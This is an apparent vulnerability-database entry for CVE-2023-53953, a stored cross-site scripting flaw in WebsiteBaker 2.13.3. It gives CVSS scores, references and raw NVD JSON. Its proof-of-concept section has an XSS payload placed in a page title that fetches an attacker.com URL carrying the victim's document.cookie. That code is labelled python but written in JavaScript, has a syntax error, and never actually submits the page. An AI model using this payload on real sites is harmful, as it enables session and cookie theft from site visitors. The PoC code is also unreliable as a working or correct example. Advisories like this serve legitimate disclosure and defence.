CVE-2023-53953

Description

WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts when creating web pages. Attackers can craft malicious payloads in page titles that execute arbitrary JavaScript when the page is viewed by other users.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:websitebaker:websitebaker:2.13.3:*:*:*:*:*:*:* - VULNERABLE

WebsiteBaker CMS 2.13.3及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2023-53953 PoC - WebsiteBaker Stored XSS via Page Title // Target: WebsiteBaker 2.13.3 // Author: VulnCheck ([email protected]) // Step 1: Authenticate with low-privilege account const loginEndpoint = 'https://target-website.com/admin/login/index.php'; const credentials = { url: loginEndpoint, postData: { url: '/admin/start/index.php', username_fieldname: 'username', password_fieldname: 'password', username: 'attacker_account', password: 'attacker_password' } }; // Step 2: Create new page with malicious title const pageCreationEndpoint = 'https://target-website.com/admin/pages/add.php'; const maliciousPayload = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\"> '; const pageData = { parent': 0, type: 'page', title: maliciousPayload, // XSS payload in title field modified_when: '', modified_by: '' }; // Step 3: Submit the malicious page // When any user views the page, the XSS payload executes // Attacker receives victim's cookies via the fetch request

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53953
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53953
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53953/
[4] VulDB https://vuldb.com/cve/CVE-2023-53953
[5] https://websitebaker.org/pages/en/home.php
[6] https://www.exploit-db.com/exploits/51349
[7] https://www.vulncheck.com/advisories/websitebaker-stored-cross-site-scripting-via-page-creation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53953", "sourceIdentifier": "[email protected]", "published": "2025-12-19T21:15:51.590", "lastModified": "2025-12-27T17:15:45.053", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebsiteBaker 2.13.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts when creating web pages. Attackers can craft malicious payloads in page titles that execute arbitrary JavaScript when the page is viewed by other users."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:websitebaker:websitebaker:2.13.3:*:*:*:*:*:*:*", "matchCriteriaId": "52C2C264-F74B-4BD0-9A67-6B851B62DAE2"}]}]}], "references": [{"url": "https://websitebaker.org/pages/en/home.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51349", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/websitebaker-stored-cross-site-scripting-via-page-creation", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}